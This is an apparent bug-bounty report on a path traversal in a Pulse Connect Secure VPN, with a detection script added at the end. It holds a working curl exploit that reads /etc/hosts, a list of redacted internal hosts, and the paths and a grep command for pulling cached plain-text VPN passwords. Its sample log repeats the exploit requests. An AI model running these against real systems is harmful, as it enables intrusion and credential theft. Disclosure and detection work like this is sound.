CVSS3: 10.0 Critical
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.973 High
Percentile: 99.8%
Summary / Description:
█████ is vulnerable to Path Traversal which can lead to remote code execution.
Critical
cURL command to get the file /etc/hosts:
curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'
## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019
127.0.0.1 localhost
█████128.141 KMPC1_Node4
█████████252.82 acrcxznxx07d-10███
███████252.74 acrcxznxx06d-10███
███252.67 ODA-SCAN███
█████████252.65 ODA-VIP-1█████████
█████████252.63 ODA-1██████
███252.196 subversion████████
██████252.134 acrcxznxx07d-12██████
██████████252.13 ODA-2████
█████251.16 acdeva0xxb5l010███
████251.15 acdeva0xxb5l009████████
███████251.14 acdeva0xxb5l008████████
█████████250.239 devikrome█████
███████250.216 ws.soa██████
██████████250.192 ac0hxzndb01d-07.rsn.aac████
█████████250.16 devccimm███
██████250.112 devauth████████l devauth████████
████████250.104 ac0hxznap02d-03████████
███████1.235 spex████████
████1.205 auth████████
███1.164 internal████ internal███████
████1.142 ensq██████████ ensq█████
███████0.92 ac0hqa0xxa3b021.rsn.aac█████████
███0.55 g2g███
█████████0.177 Ac0hqa0xxa1b005.rsn.aac█████████
█████64.181 ac0hqsmap13p
████64.142 ac0hqsmxx03p
██████████40.237 emmggb████████
████████40.126 ac0hqapxx25p.rsn.aac████████
██████████221.42 gcrcknox gcrcknox████
█████████220.81 ft1ariss█████
██████220.245 ccimm█████████
██████220.150 ensqrtn████
███████220.145 pthensqtrain██████
██████212.9 acrcea0xxb5l035█████
██████212.64 acrcea0xxb5l034██████
███18.60 questcentral questcentral███
██████████163.35 hrcremedy█████
███████78.107 afrissimt.rs████
██████8.61 netscout███████
████████205.203 ac0hqa0xxb5l007█████
█████████205.202 ac0hqa0xxb5l006██████████
██████205.200 acrtna0xxb5l003█████
███146.8 AC0HQC2A0A3B021.RSN.AAC████████
█████████146.7 AC0HQC2A0A3B020.rsn.aac████████
█████████145.91 ac0hqwsxx04p.rsn.aac█████
█████145.149 caliber11.rsn.aac███████
████145.118 ac0hqwsap06p.rsn.aac██████████
██████144.95 ikrome████ ft1ikrome█████████
████144.91 Auth██████████
█████144.216 ac0hqc2a0a3b010.rsn.aac██████
████197.16 acft1a0xxb5l005███████
███197.15 acft1a0xxb5l004███
████196.62 ft1ccimm██████████
█████████196.28 ft1auth████
███████195.247 ac0hldbxx02t████
███195.246 ac0hldbxx01t█████
████195.195 ac0hxzndb04t-01████
██████195.188 ac0hxznap04t-03█████████
██████████195.158 ac0hxznxx24t-02██████
██████████195.133 ft1internal████████
████████195.127 ac0hxznap03t-03█████████
██████████194.78 ws13t.soa█████ ws14t.soa█████
█████████194.165 ft1ensq███ ac0hxznxx03t-08-ensq_wls1█████████
█████194.119 rmdwebtopft1███████
We can grab any other file on this system:
/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb
The VPN user and hashed passwords are stored in the mtmp/system file, but when users log into the application, it caches the plain-text password into dataa/data.mdb.

grep 'password@9' data.mdb -a

will get you a load of plain-text passwords.
████████
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101
Update the Pulse Connect Secure VPN
Critical, an attacker can get code execution with this vulnerability.
https://hackerone.com/reports/591295
Thanks,
Corben (@cdl)
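Detection logic for the request shape shown in the curl command above, as an added example that is not part of the original report and not Pulse Secure's own code. It parses access-log lines (constructed here for the example; the first and third mirror the report's request, the rest are ordinary traffic), percent-decodes the path so an encoded ..%2f variant is caught as well as the literal form, resolves dot-segments the way a server would (RFC 3986 section 5.2.4), and flags any request where /dana/html5acc/guacamole/ appears in the literal path but the resolved path has climbed out of that directory. The query string is ignored on purpose, since the traversal lives in the path. The HTML5ACC_PREFIX constant, the log format and the label names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the report). Lines 1 and 3
# mirror the request shape of the curl command in the report; the others are
# ordinary traffic to the same appliance.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2019:13:30:01 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/ HTTP/1.1" 200 2048
10.0.0.6 - - [01/Aug/2019:13:30:05 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
10.0.0.7 - - [01/Aug/2019:13:30:09 +0000] "GET /dana-na/../dana/html5acc/guacamole/..%2f..%2f..%2f..%2f..%2f..%2fdata/runtime/mtmp/system?/dana/html5acc/guacamole/ HTTP/1.1" 200 90112
10.0.0.8 - - [01/Aug/2019:13:30:12 +0000] "GET /dana/html5acc/guacamole/app.js HTTP/1.1" 200 300
10.0.0.9 - - [01/Aug/2019:13:30:15 +0000] "GET /dana/html5acc/guacamole/../guacamole/app.js HTTP/1.1" 200 300
"""

# Directory the HTML5 access handler serves from, as it appears in the exploit
# path above (assumed constant for this example).
HTML5ACC_PREFIX = "/dana/html5acc/guacamole/"

# Combined-log style request line: source, two dashes, timestamp, quoted request.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def decoded_path(raw_target: str) -> str:
    """Drop the query string and percent-decode the path, so an encoded ..%2f
    is seen the same way a decoder on the server would see it."""
    return unquote(raw_target.split("?", 1)[0])


def normalize_path(raw_target: str) -> str:
    """Resolve '.' and '..' segments as RFC 3986 section 5.2.4 does; this is
    what turns the report's long path into /etc/hosts."""
    out = []
    for seg in decoded_path(raw_target).split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg and seg != ".":
            out.append(seg)
    return "/" + "/".join(out)


def classify(raw_target: str):
    """Return (label, resolved_path) for a suspicious target, or None."""
    path = decoded_path(raw_target)
    if ".." not in path.split("/"):
        # Browsers normalize dot-segments away before sending; a literal '..'
        # in the path is itself unusual (curl --path-as-is keeps it).
        return None
    resolved = normalize_path(raw_target)
    if HTML5ACC_PREFIX in path and not resolved.startswith(HTML5ACC_PREFIX):
        # Same shape as the report's request: the handler's directory is named
        # in the literal path, yet the resolved path has climbed out of it.
        return ("html5acc-traversal", resolved)
    return ("literal-dot-segment", resolved)


def scan_log(text: str):
    """Parse access-log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group("target"))
        if verdict:
            label, resolved = verdict
            findings.append({"src": m.group("src"), "target": m.group("target"),
                             "label": label, "resolved": resolved})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']:<10} {f['label']:<22} -> {f['resolved']}")
```

Run against the sample, the two exploit-shaped lines are reported as html5acc-traversal with resolved paths /etc/hosts and /data/runtime/mtmp/system, the fifth line is reported only as a literal dot-segment because it stays inside the handler's directory, and the two plain requests produce nothing. Resolving the path rather than string-matching the raw URL is what keeps the rule from being sidestepped by a different number of ../ hops or by percent-encoding.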